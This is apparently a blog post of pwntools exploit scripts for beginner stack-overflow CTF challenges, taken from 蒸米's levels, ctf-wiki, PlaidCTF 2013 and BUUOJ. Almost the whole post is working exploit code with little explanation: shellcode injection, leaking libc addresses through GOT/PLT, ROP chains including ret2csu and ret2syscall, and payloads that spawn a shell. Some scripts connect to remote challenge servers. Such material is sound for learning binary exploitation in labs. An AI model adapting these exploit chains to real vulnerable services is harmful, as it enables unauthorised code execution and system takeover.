Pwn入门-栈溢出 - Monitor's Blog

Pwn–stack_overflow

题目来源于：蒸米pwn/ctf-wiki

level1

#!/usr/bin/python
# -*- coding:utf-8 -*-
from pwn import *
debug = True
context.log_level = 'debug'
context.arch = "i386"
context.terminal = ['/bin/zsh']
sh = process('./level1')
ret_addr=0xffffd580
gdb.attach(sh, "b vulnerable_function")
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(140,'a')+p32(ret_addr)
sh.sendline(payload)
sh.interactive()

level2

法一:

from pwn import *

sh = process('./level2')

offset = 140

sys_addr = 0xf7e4eda0

str_addr = 0xf7f6fa0b

payload = 'a'*offset + p32(sys_addr) + p32(0x123) + p32(str_addr)

sh.sendline(payload)
sh.interactive()

法二:

# -*- coding: UTF-8 -*-
from pwn import *
# libc.so given
sh = 0
vuln_addr = 0x0804843B
out_color = '\033[1;32m'
def leak():
      print(out_color+"======start leak write address======")
      global write_addr      
      elf = ELF('./level2')
      write_plt = elf.symbols['write']
      write_got = elf.got['write']
      print(out_color+"write_plt = "+hex(write_plt))
      print("write_got = "+hex(write_got))
      payload1 = 'a' * 140 + p32(write_plt) + p32(vuln_addr) + p32(1) + p32(write_got) + p32(4)
      sh.send(payload1)
      write_addr = u32(sh.recv(4))
      print(out_color+"write_addr = "+hex(write_addr))

def pwn():
      print("======start pwn it======")
      libc = ELF('./libc.so')
      lib_base_addr = write_addr - libc.symbols['write']
      sys_addr = lib_base_addr + libc.symbols['system']
      bin_addr = lib_base_addr + next(libc.search("/bin/sh"))
      print(out_color+"sys_addr = "+hex(sys_addr))
      print("bin_addr = "+hex(bin_addr))
      payload2 = 'a' * 140 + p32(sys_addr) + p32(0x123) + p32(bin_addr)
      sh.send(payload2)
      sh.interactive()

def debug(debug):
      global sh
      if(debug == 1):
            sh = process('./level2')
            context.arch = 'amd64'
            context.terminal = ['/bin/zsh']
            context.log_level = 'debug'
            # gdb.attach(sh,'')
      else:
            sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
      debug(1)
      leak()
      pwn()

法三:

# -*- coding: UTF-8 -*-
from pwn import *
from LibcSearcher import *
#we don't konw libc
sh = 0
vuln_addr = 0x0804843B
out_color = '\033[1;32m'
def leak():
      print(out_color+"======start leak write address======")
      global write_addr      
      elf = ELF('./level2')
      write_plt = elf.symbols['write']
      write_got = elf.got['write']
      print(out_color+"write_plt = "+hex(write_plt))
      print("write_got = "+hex(write_got))
      payload1 = 'a' * 140 + p32(write_plt) + p32(vuln_addr) + p32(1) + p32(write_got) + p32(4)
      sh.send(payload1)
      write_addr = u32(sh.recv(4))
      print(out_color+"write_addr = "+hex(write_addr))

def pwn():
      print("======start pwn it======")
      libc = LibcSearcher("write",write_addr)
      lib_base_addr = write_addr - libc.dump("write")
      sys_addr = lib_base_addr + libc.dump("system")
      bin_addr = lib_base_addr + libc.dump("str_bin_sh")
      print(out_color+"sys_addr = "+hex(sys_addr))
      print("bin_addr = "+hex(bin_addr))
      payload2 = 'a' * 140 + p32(sys_addr) + p32(0x123) + p32(bin_addr)
      sh.send(payload2)
      sh.interactive()

def debug(debug):
      global sh
      if(debug == 1):
            sh = process('./level2')
            context.arch = 'amd64'
            context.terminal = ['/bin/zsh']
            context.log_level = 'debug'
            # gdb.attach(sh,'')
      else:
            sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
      debug(1)
      leak()
      pwn()

level3

from pwn import *

sh = process('./level3')
context.arch = 'amd64'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
sys_addr = 0x000000000040057B
ret = 0x000000000040044e
payload = 'a'*136 + p64(ret)+p64(ret)+p64(sys_addr)
sh.sendline(payload)
sh.interactive()

level4

from pwn import *

sh = 0

def getAddr():
      global sys_addr
      global str_bin_addr
      global pop_rdi_addr
      global ret_addr
      sys_addr = int(sh.recv(14),16)
      print("sys_addr = " + hex(sys_addr))
      libc = ELF('./libc.so')
      libc_base_addr = sys_addr - libc.symbols['system']
      str_bin_addr = libc_base_addr + next(libc.search('/bin/sh'))
      pop_rdi_addr = libc_base_addr + 0x000000000002155f
      ret_addr = libc_base_addr + 0x00000000000008aa
      print("libc_base_addr = " + hex(libc_base_addr))
      print("str_bin_addr = " + hex(str_bin_addr))
      print("pop_rdi_addr = " + hex(pop_rdi_addr))
      print("ret_addr = " + hex(ret_addr))

def pwn():
      print("======start pwn it======")
      payload = 'a' * 136 +  p64(pop_rdi_addr) + p64(str_bin_addr) + p64(ret_addr) + p64(sys_addr)
      sh.sendlineafter("Hello, World",payload)
      sh.interactive()

def debug(debug):
      global sh
      if(debug == 1):
            sh = process('./level4')
            context.arch = 'amd64'
            context.terminal = ['/bin/zsh']
            context.log_level = 'debug'
            # gdb.attach(sh,'')
      else:
            sh = remote(ip,port)
debug(1)
getAddr()
pwn()

level5(ret2csu_init)

from pwn import *

sh = 0
main_addr = 0x0000000000400559

def csu_gadget():
      print('========gadget start=======')
      global write_addr
      elf = ELF('./level5')

      # write_plt = elf.plt['write']
      # write_plt = 0x400430
      write_got = elf.got['write']
      # print('write_plt = ' + hex(write_plt))
      print('write_got = ' + hex(write_got))
      gadget1_addr = 0x00000000004005E6
      gadget2_addr = 0x00000000004005D0
      payload1 = 'a' * 136 + p64(gadget1_addr) + p64(0) + p64(0) + p64(1) + p64(write_got) + p64(1) + p64(write_got) + p64(8) + p64(gadget2_addr) + 'b'*56 + p64(main_addr)
      sh.recvuntil("Hello, World\n")
      sh.send(payload1)
      write_addr = u64(sh.recv(8))
      print('write_addr = '+hex(write_addr))

def pwn():
      print('========pwn start========')
      libc = ELF('./libc.so')
      libc_base_addr = write_addr - libc.symbols['write']
      print("libc_base_addr = " + hex(libc_base_addr))
      sys_addr = libc_base_addr + libc.symbols['system']
      print("sys_addr = " + hex(sys_addr))
      str_bin_addr = libc_base_addr + next(libc.search('/bin/sh'))
      print("str_bin_addr = " + hex(str_bin_addr))
      pop_rdi_addr = libc_base_addr + 0x000000000002155f
      ret_addr = libc_base_addr + 0x00000000000008aa
      payload2 = 'a' * 136 + p64(pop_rdi_addr) + p64(str_bin_addr) + p64(ret_addr) + p64(sys_addr)
      # sh.recvuntil("Hello, World\n")
      sh.send(payload2)
      sh.interactive()
      
def debug(debug):
      global sh
      if(debug == 1):
            sh = process('./level5')
            context.arch = 'amd64'
            context.terminal = ['/bin/zsh']
            context.log_level = 'debug'
            # gdb.attach(sh,'')
      else:
            sh = remote('','')

debug(1)
csu_gadget()
pwn()

ret2csu_init(ctf-wiki)

from pwn import *

sh = 0
offset = 136
vuln_main = 0x0000000000400588
def csu_gadget():
      elf = ELF('./level5-2')
      global write_addr
      write_got = elf.got['write']
      print("write_plt = "+hex(write_got))
      paylaod = flat(['a' * offset , 0x400616 , 0,0,1,write_got,8,write_got,1,0x400600,'a'*56,vuln_main])
      sh.recvuntil('Hello, World\n')
      sh.send(paylaod)
      write_addr = u64(sh.recv(8))
      print("write_addr = "+hex(write_addr))

def pwn():
      libc = ELF('./libc.so')
      libc_base_addr = write_addr - libc.symbols['write']
      print("libc_base_addr = "+hex(libc_base_addr))
      sys_addr = libc_base_addr + libc.symbols['system']
      print('sys_addr = ' + hex(sys_addr))
      str_bin_addr = libc_base_addr + next(libc.search('/bin/sh'))
      print('str_bin_addr = ' + hex(str_bin_addr))
      pop_rdi_addr = libc_base_addr + 0x000000000002155f
      ret_addr = libc_base_addr + 0x00000000000008aa
      payload = flat(['a' * offset,pop_rdi_addr,str_bin_addr,ret_addr,sys_addr])
      sh.recvline('Hello, World\n')
      sh.send(payload)
      sh.interactive()

def debug(debug):
      global sh
      if(debug == 1):
            sh = process('./level5-2')
            context.arch = 'amd64'
            context.terminal = ['/bin/zsh']
            context.log_level = 'debug'
            # gdb.attach(sh,'')
      else:
            sh = remote('','')

debug(1)
csu_gadget()
pwn()

ctfwiki

ret2text

# Method one
# from pwn import *

# p=process('./ret2text')

# sys_addr=0x8048490
# bin_addr=0x8048763

# payload='a'*112+p32(sys_addr)+p32(0x123)+p32(bin_addr)

# p.sendline(payload)

# p.interactive()

# Method two
from pwn import *
# libc.so given
sh = 0
vuln_addr = 0x08048648
out_color = '\033[1;32m'
def leak():
      print(out_color+"======start leak puts address======")
      global puts_addr      
      elf = ELF('./ret2text')
      puts_plt = elf.symbols['puts']
      puts_got = elf.got['puts']
      print(out_color+"puts_plt = "+hex(puts_plt))
      print("puts_got = "+hex(puts_got))
      payload1 = 'a' * 112 + p32(puts_plt) + p32(vuln_addr) + p32(puts_got)
      sh.recvuntil("There is something amazing here, do you know anything?\n")
      sh.sendline(payload1)
      puts_addr = 0xf7e73ca0
      # puts_addr = sh.recv(13)[-4:]
      # str1 = ''
      # for item in puts_addr:
      #       global str1
      #       str1 += item
      # puts_addr = u32(str1)
      print(out_color+"puts_addr = "+hex(puts_addr))

def pwn():
      print("======start pwn it======")
      libc = ELF('./challenge-yuque/libc.so')
      lib_base_addr = puts_addr - libc.symbols['puts']
      sys_addr = lib_base_addr + libc.symbols['system']
      bin_addr = lib_base_addr + next(libc.search("/bin/sh"))
      print(out_color+"sys_addr = "+hex(sys_addr))
      print("bin_addr = "+hex(bin_addr))
      payload2 = 'a' * 104 + p32(sys_addr) + p32(0x123) + p32(bin_addr)
      sh.sendline(payload2)
      sh.interactive()

def debug(debug):
      global sh
      if(debug == 1):
            sh = process('./ret2text')
            context.arch = 'amd64'
            context.terminal = ['/bin/zsh']
            context.log_level = 'debug'
            # gdb.attach(sh,'')
      else:
            sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
      debug(1)
      leak()
      pwn()

ret2shellcode

# Method one
# from pwn import *
# sh = process('./ret2shellcode')

# context.arch = 'i386'
# context.terminal = ['/bin/zsh']
# context.log_level = 'debug'
# # gdb.attach(sh,'')

# shellcode = asm(shellcraft.sh())
# payload = shellcode.ljust(112,'a') + p32(0x0804A080)

# sh.sendline(payload)
# sh.interactive()

# method two
# -*- coding: utf-8 -*-
from pwn import *
# libc.so given
sh = 0
vuln_addr = 0x0804852D
out_color = '\033[1;32m'
def leak():
      print(out_color+"======start leak puts address======")
      global puts_addr      
      elf = ELF('./ret2shellcode')
      puts_plt = elf.symbols['puts']
      puts_got = elf.got['puts']
      print(out_color+"puts_plt = "+hex(puts_plt))
      print("puts_got = "+hex(puts_got))
      payload1 = 'a' * 112 + p32(puts_plt) + p32(vuln_addr) + p32(puts_got)
      sh.recvuntil("No system for you this time !!!\n")
      sh.sendline(payload1)
      # puts_addr = 0xf7e73ca0
      puts_addr = sh.recv(13)[-4:]
      str1 = ''
      for item in puts_addr:
            global str1
            str1 += item
      puts_addr = u32(str1)
      print(out_color+"puts_addr = "+hex(puts_addr))

def pwn():
      print("======start pwn it======")
      libc = ELF('./challenge-yuque/libc.so')
      lib_base_addr = puts_addr - libc.symbols['puts']
      sys_addr = lib_base_addr + libc.symbols['system']
      bin_addr = lib_base_addr + next(libc.search("/bin/sh"))
      print(out_color+"sys_addr = "+hex(sys_addr))
      print("bin_addr = "+hex(bin_addr))
      payload2 = 'a' * 104 + p32(sys_addr) + p32(0x123) + p32(bin_addr)
      sh.sendline(payload2)
      sh.interactive()

def debug(debug):
      global sh
      if(debug == 1):
            sh = process('./ret2shellcode')
            context.arch = 'amd64'
            context.terminal = ['/bin/zsh']
            context.log_level = 'debug'
            # gdb.attach(sh,'')
      else:
            sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
      debug(1)
      leak()
      pwn()

ret2syscall

from pwn import *
#gadgets
#int 0x80 => eax = 0xb => sys_execv(bx,cx,dx..)
sh = process('./rop')
context.arch = 'i386'
context.terminal = ['/bin/sh']
context.log_level = 'debug'
# gdb.attach(sh,'')
pop_eax_addr =  0x080bb196
pop_ebx_ecx_edx_addr = 0x0806eb90
get_int_addr = 0x08049421
str_bin_sh_addr = 0x080be408

payload = flat(['a'*112,pop_eax_addr,0xb,pop_ebx_ecx_edx_addr,0,0,str_bin_sh_addr,get_int_addr])

sh.recvuntil("What do you plan to do?\n")
sh.sendline(payload)
sh.interactive()

stack_overflow

# -*- coding: utf-8 -*-
from pwn import *
# libc.so given
sh = 0
vuln_addr = 0x08048454
out_color = '\033[1;32m'
def leak():
      print(out_color+"======start leak puts address======")
      global puts_addr      
      elf = ELF('./stack_overflow')
      puts_plt = elf.symbols['puts']
      puts_got = elf.got['puts']
      print(out_color+"puts_plt = "+hex(puts_plt))
      print("puts_got = "+hex(puts_got))
      payload1 = 'a' * 24 + p32(puts_plt) + p32(vuln_addr) + p32(puts_got)
      sh.sendline(payload1)
      out_str = sh.recv(41)
      str2 = ''
      for item in out_str[-4:]:
            global str2
            str2 += str(item)
      puts_addr = u32(str2)
      print(out_color+"puts_addr = "+hex(puts_addr))

def pwn():
      print("======start pwn it======")
      libc = ELF('./challenge-yuque/libc.so')
      lib_base_addr = puts_addr - libc.symbols['puts']
      sys_addr = lib_base_addr + libc.symbols['system']
      bin_addr = lib_base_addr + next(libc.search("/bin/sh"))
      print(out_color+"sys_addr = "+hex(sys_addr))
      print("bin_addr = "+hex(bin_addr))
      payload2 = 'a' * 24 + p32(sys_addr) + p32(0x123) + p32(bin_addr)
      sh.sendline(payload2)
      sh.interactive()

def debug(debug):
      global sh
      if(debug == 1):
            sh = process('./stack_overflow')
            context.arch = 'i386'
            context.terminal = ['/bin/zsh']
            context.log_level = 'debug'
            # gdb.attach(sh,'')
      else:
            sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
      debug(1)
      leak()
      pwn()

ret2libc1

from pwn import *

sh = process('./ret2libc1')

sys_addr = 0x08048460
bin_addr = 0x08048720

payload = 'a' * 112 + p32(sys_addr) + p32(0x123) + p32(bin_addr)

sh.sendline(payload)
sh.interactive()

ret2libc2

from pwn import *

sh = process('./ret2libc2')
context.arch = 'i386'
context.terminal = ['/bin/sh']
context.log_level = 'debug'
gdb.attach(sh,'')
gets_plt = 0x08048460
system_plt = 0x08048490
pop_ebx = 0x0804843d
buf2 = 0x804a080
payload = flat(
    ['a' * 112, gets_plt, pop_ebx, buf2, system_plt, 0xdeadbeef, buf2])
sh.sendline(payload)
sh.sendline('/bin/sh')
sh.interactive()

ret2libc3

# -*- coding: utf-8 -*-
from pwn import *
# libc.so given
sh = 0
vuln_addr = 0x08048618
out_color = '\033[1;32m'
def leak():
      print(out_color+"======start leak puts address======")
      global puts_addr      
      elf = ELF('./ret2libc3')
      puts_plt = elf.symbols['puts']
      puts_got = elf.got['puts']
      print(out_color+"puts_plt = "+hex(puts_plt))
      print("puts_got = "+hex(puts_got))
      payload1 = 'a' * 112 + p32(puts_plt) + p32(vuln_addr) + p32(puts_got)
      sh.sendlineafter('Can you find it !?',payload1)
      puts_addr = u32(sh.recv(4))
      # str2 = ''
      # for item in out_str[-4:]:
      #       global str2
      #       str2 += str(item)
      # puts_addr = u32(str2)
      print(out_color+"puts_addr = "+hex(puts_addr))

def pwn():
      print("======start pwn it======")
      libc = ELF('./challenge-yuque/libc.so')
      # sys_addr = puts_addr -(libc.symbols['puts'] - libc.symbols['system'])
      # bin_addr = puts_addr -(libc.symbols['puts'] - next(libc.search('/bin/sh')))
      lib_base_addr = puts_addr - libc.symbols['puts']
      sys_addr = lib_base_addr + libc.symbols['system']
      bin_addr = lib_base_addr + next(libc.search("/bin/sh"))
      print(out_color+"sys_addr = "+hex(sys_addr))
      print("bin_addr = "+hex(bin_addr))
      # payload2 = 'a' * 104 + p32(sys_addr) + p32(0x1234) + p32(bin_addr)
      payload2 = 'a'*104 + p32(sys_addr) + p32(0x1234) + p32(bin_addr)
      sh.sendline(payload2)
      sh.interactive()

def debug(debug):
      global sh
      if(debug == 1):
            sh = process('./ret2libc3')
            context.arch = 'i386'
            context.terminal = ['/bin/zsh']
            context.log_level = 'debug'
            # gdb.attach(sh,'')
      else:
            sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
      debug(1)
      leak()
      pwn()

2013-PlaidCTF-ropasaurusrex

from pwn import *

sh = 0
offset = 140
vuln_addr = 0x804841D
def leak():
      global write_addr
      elf = ELF('./ropasaurusrex')
      write_plt = elf.plt['write']
      print("write_plt = " + hex(write_plt))
      write_got = elf.got['write']
      print('write_got = ' + hex(write_got))
      payload = 'a' * offset + p32(write_plt) + p32(vuln_addr) + p32(1) + p32(write_got) +p32(4)
      sh.send(payload)
      write_addr = u32(sh.recv(4))
      print("write_addr = " + hex(write_addr))

def pwn():
      libc = ELF('/lib/i386-linux-gnu/libc.so.6')
      libc_base_addr = write_addr - libc.symbols['write']
      sys_addr = libc_base_addr + libc.symbols['system']
      str_bin_addr = libc_base_addr + next(libc.search('/bin/sh'))
      paylaod = 'a' * offset + p32(sys_addr) + p32(0x123) + p32(str_bin_addr)
      sh.send(paylaod)
      sh.interactive()
def debug(debug):
      global sh
      if(debug == 1):
            sh = process('./ropasaurusrex')
            context.arch = 'i386'
            context.terminal = ['/bin/zsh']
            context.log_level = 'debug'
            # gdb.attach(sh,'')
      else:
            sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
      debug(1)
      leak()
      pwn()

ciscn_2019_n_1(buu)

from pwn import *

sh = 0
vuln_addr = 0x0000000000400676

def leak():
      global puts_addr
      elf = ELF('./ciscn_2019_n_1')
      puts_got = elf.got['puts']
      puts_plt = elf.plt['puts'] + 4
      print("puts_got = " + hex(puts_got))
      print('puts_plt = ' + hex(puts_plt))
      pop_rdi_addr = 0x0000000000400793
      payload1 = 'a' * 56 + p64(pop_rdi_addr) + p64(puts_got) +p64(puts_plt)+p64(vuln_addr)
      sh.recvuntil("Let's guess the number.")
      sh.sendline(payload1)
      # puts_addr = u64(sh.recv(8))
      # print(sh.recv(8))
      # puts_addr = 0x7ffff7a649c0
      sh.recvuntil("Its value should be 11.28125")
      # sh.recv(10)
      puts_addr = u64(sh.recv(8))
      puts_addr = hex(puts_addr)
      puts_addr = str(puts_addr)
      puts_addr = '0x'+puts_addr[3:15]
      puts_addr = int(puts_addr,0)
      # puts_addr = hex(puts_addr)
      print("puts_addr = " + hex(puts_addr))

def pwn():
      libc = ELF('./libc.so')
      libc_base_addr = puts_addr - libc.symbols['puts']
      print("libc_base_addr = "+hex(libc_base_addr))
      sys_addr = libc_base_addr + libc.symbols['system']
      print("sys_addr = " + hex(sys_addr))
      str_bin_addr = libc_base_addr + next(libc.search('/bin/sh'))
      print("str_bin_addr = " + hex(str_bin_addr))
      ret_addr = libc_base_addr + 0x00000000000008aa
      pop_rdi_addr = libc_base_addr + 0x000000000002155f
      payload2 = 'a' * 56 + p64(pop_rdi_addr) + p64(str_bin_addr)  + p64(ret_addr) +p64(sys_addr)
      sh.sendline(payload2)
      sh.interactive()
      

def debug(debug):
      global sh
      if(debug == 1):
            sh = process('./ciscn_2019_n_1')
            context.arch = 'amd64'
            context.terminal = ['/bin/zsh']
            context.log_level = 'debug'
            # gdb.attach(sh,'')
      else:
            sh = remote('node3.buuoj.cn',29191)

if __name__ == "__main__":
      debug(1)
      leak()
      pwn()

pwn1_sctf_2016(buu)

from pwn import *

sh = 0
def debug(debug):
	global sh
	if(debug==1):
		context.log_level = 'debug'
		context.arch = 'amd64'
		context.terminal = ['/bin/zsh', 'splitw', '-h']
		sh = process('./pwn1_sctf_2016')
		gdb.attach(sh,'')
	else:
		sh = remote('node3.buuoj.cn',27821)

def pwn():
	
	ret_addr = 0x08048F0D
	payload = 'I'*21+'a'+p32(ret_addr)
	# sh.recvuntil('Tell me something about yourself:')
	sh.sendline(payload)
	sh.interactive()

if __name__ == "__main__":
	debug(1)
	pwn()